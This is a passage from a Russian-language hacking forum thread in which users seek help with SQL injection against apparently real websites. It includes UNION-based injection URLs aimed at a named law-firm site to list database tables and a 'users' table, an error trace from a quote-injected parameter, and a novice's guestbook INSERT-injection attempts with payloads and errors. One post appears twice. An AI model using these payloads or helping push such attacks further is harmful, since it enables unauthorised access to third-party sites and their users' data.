ANTICHAT — форум по информационной безопасности, OSINT и технологиям

winstrool said:
так отоброжает скуль:
_http://www.pravo-advokat.ru/index.php?p_id=2&m_id=-4+/*!union*/+select+1,2,/*!table_name*/+from+information_schema.tables
а так нет:
_http://www.pravo-advokat.ru/index.php?p_id=2&m_id=-4+/*!union*/+union+select+1,2,/*!column_name*/+from+information_schema.columns+where+table_name= 0x%75%73%65%72%73
подскажите куда копать дальше.

winstrool said:
так отоброжает скуль:
_http://www.pravo-advokat.ru/index.php?p_id=2&m_id=-4+/*!union*/+select+1,2,/*!table_name*/+from+information_schema.tables
а так нет:
_http://www.pravo-advokat.ru/index.php?p_id=2&m_id=-4+/*!union*/+union+select+1,2,/*!column_name*/+from+information_schema.columns+where+table_name= 0x%75%73%65%72%73
подскажите куда копать дальше.

org.springframework.beans.TypeMismatchException: Failed to convert value of type [java.lang.String] to required type [java.lang.Integer]; nested exception is java.lang.NumberFormatException: For input string: "37752'" at org.springframework.beans.SimpleTypeConverter.conv ertIfNecessary(SimpleTypeConverter.java:50) at org.springframework.validation.DataBinder.convertI fNecessary(DataBinder.java:454) at org.springframework.web.bind.annotation.support.Ha ndlerMethodInvoker.resolveRequestParam(HandlerMeth odInvoker.java:339) at org.springframework.web.bind.annotation.support.Ha ndlerMethodInvoker.resolveHandlerArguments(Handler MethodInvoker.java:200) at org.springframework.web.bind.annotation.support.Ha ndlerMethodInvoker.invokeHandlerMethod(HandlerMeth odInvoker.java:130) at org.springframework.web.servlet.mvc.annotation.Ann otationMethodHandlerAdapter.invokeHandlerMethod(An notationMethodHandlerAdapter.java:310) at org.springframework.web.servlet.mvc.annotation.Ann otationMethodHandlerAdapter.handle(AnnotationMetho dHandlerAdapter.java:297) at org.springframework.web.servlet.DispatcherServlet. doDispatch(DispatcherServlet.java:875) at org.springframework.web.servlet.DispatcherServlet. doService(DispatcherServlet.java:809) at org.springframework.web.servlet.FrameworkServlet.p rocessRequest(FrameworkServlet.java:571) at org.springframework.web.servlet.FrameworkServlet.d oGet(FrameworkServlet.java:501) at javax.servlet.http.HttpServlet.service(HttpServlet .java:707) at javax.servlet.http.HttpServlet.service(HttpServlet .java:820) at org.mortbay.jetty.servlet.ServletHolder.handle(Ser vletHolder.java:487) at org.mortbay.jetty.servlet.ServletHandler$CachedCha in.doFilter(ServletHandler.java:1093) at ims.app.filters.StatusReportingFilter.doFilter(Sta tusReportingFilter.java:19) at org.mortbay.jetty.servlet.ServletHandler$CachedCha in.doFilter(ServletHandler.java:1084) at org.mortbay.jetty.servlet.ServletHandler.handle(Se rvletHandler.java:360) at org.mortbay.jetty.security.SecurityHandler.handle( SecurityHandler.java:216) at org.mortbay.jetty.servlet.SessionHandler.handle(Se ssionHandler.java:181) at org.mortbay.jetty.handler.ContextHandler.handle(Co ntextHandler.java:726) at org.mortbay.jetty.webapp.WebAppContext.handle(WebA ppContext.java:405) at org.mortbay.jetty.servlet.Dispatcher.forward(Dispa tcher.java:285) at org.mortbay.jetty.servlet.Dispatcher.forward(Dispa tcher.java:126) at ims.app.session.wl.WhiteLabelUrlHelper.findWhiteLa belRedirect(WhiteLabelUrlHelper.java:78) at gb.app.servlet.Gateway.doFilter(Gateway.java:65) at org.mortbay.jetty.servlet.ServletHandler$CachedCha in.doFilter(ServletHandler.java:1084) at org.springframework.orm.hibernate3.support.OpenSes sionInViewFilter.doFilterInternal(OpenSessionInVie wFilter.java:198) at org.springframework.web.filter.OncePerRequestFilte r.doFilter(OncePerRequestFilter.java:76) at org.mortbay.jetty.servlet.ServletHandler$CachedCha in.doFilter(ServletHandler.java:1084) at org.mortbay.jetty.servlet.ServletHandler.handle(Se rvletHandler.java:360) at org.mortbay.jetty.security.SecurityHandler.handle( SecurityHandler.java:216) at org.mortbay.jetty.servlet.SessionHandler.handle(Se ssionHandler.java:181) at org.mortbay.jetty.handler.ContextHandler.handle(Co ntextHandler.java:726) at org.mortbay.jetty.webapp.WebAppContext.handle(WebA ppContext.java:405) at org.mortbay.jetty.handler.ContextHandlerCollection .handle(ContextHandlerCollection.java:196) at org.mortbay.jetty.handler.HandlerCollection.handle (HandlerCollection.java:114) at org.mortbay.jetty.handler.HandlerWrapper.handle(Ha ndlerWrapper.java:152) at org.mortbay.jetty.handler.StatisticsHandler.handle (StatisticsHandler.java:89) at org.mortbay.jetty.handler.HandlerWrapper.handle(Ha ndlerWrapper.java:152) at org.mortbay.jetty.Server.handle(Server.java:324) at org.mortbay.jetty.HttpConnection.handleRequest(Htt pConnection.java:505) at org.mortbay.jetty.HttpConnection$RequestHandler.he aderComplete(HttpConnection.java:829) at org.mortbay.jetty.HttpParser.parseNext(HttpParser. java:514) at org.mortbay.jetty.HttpParser.parseAvailable(HttpPa rser.java:211) at org.mortbay.jetty.HttpConnection.handle(HttpConnec tion.java:380) at org.mortbay.io.nio.SelectChannelEndPoint.run(Selec tChannelEndPoint.java:395) at org.mortbay.thread.BoundedThreadPool$PoolThread.ru n(BoundedThreadPool.java:450) Caused by: java.lang.NumberFormatException: For input string: "37752'" at java.lang.NumberFormatException.forInputString(Num berFormatException.java:48) at java.lang.Integer.parseInt(Integer.java:458) at java.lang.Integer.valueOf(Integer.java:554) at org.springframework.util.NumberUtils.parseNumber(N umberUtils.java:146) at org.springframework.beans.propertyeditors.CustomNu mberEditor.setAsText(CustomNumberEditor.java:114) at org.springframework.beans.TypeConverterDelegate.do ConvertTextValue(TypeConverterDelegate.java:374) at org.springframework.beans.TypeConverterDelegate.do ConvertValue(TypeConverterDelegate.java:350) at org.springframework.beans.TypeConverterDelegate.co nvertIfNecessary(TypeConverterDelegate.java:173) at org.springframework.beans.TypeConverterDelegate.co nvertIfNecessary(TypeConverterDelegate.java:107) at org.springframework.beans.SimpleTypeConverter.conv ertIfNecessary(SimpleTypeConverter.java:47) ... 47 more

вечер всем добрый ... нужно помощь в sql inj ... сразу скажу .. я новичок ... так что могу написать глупость ...
к делу ... есть иньекция в guestbook одного сайта (могу кинуть ссылку в пм) ...
при добавление ковычки к запросу получаю ошибку :
Ошибка: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1111@1111.111','bbbbbbbbbbb',null, CURRENT_TIMESTAMP)' at line 1
Как я понимаю запрос выглядит примерно так :
INSERT INTO tables VALUES ('name','mail','mesege',null, CURRENT_TIMESTAMP)
подставляю ' ) --
получаю ошибку
Ошибка: Column count doesn't match value count at row 1
тогда подставляю bvbvbvbb','ewewe@wewew.ru','ffffffffff',null, CURRENT_TIMESTAMP ) --
как я понимаю ... должно добавиться сообщение в гостевой книге но опятьже получаю ошибку
Ошибка: Column count doesn't match value count at row 1
Подскажите люди добрые ... как тут быть
P.s иньекцию делаю через форму name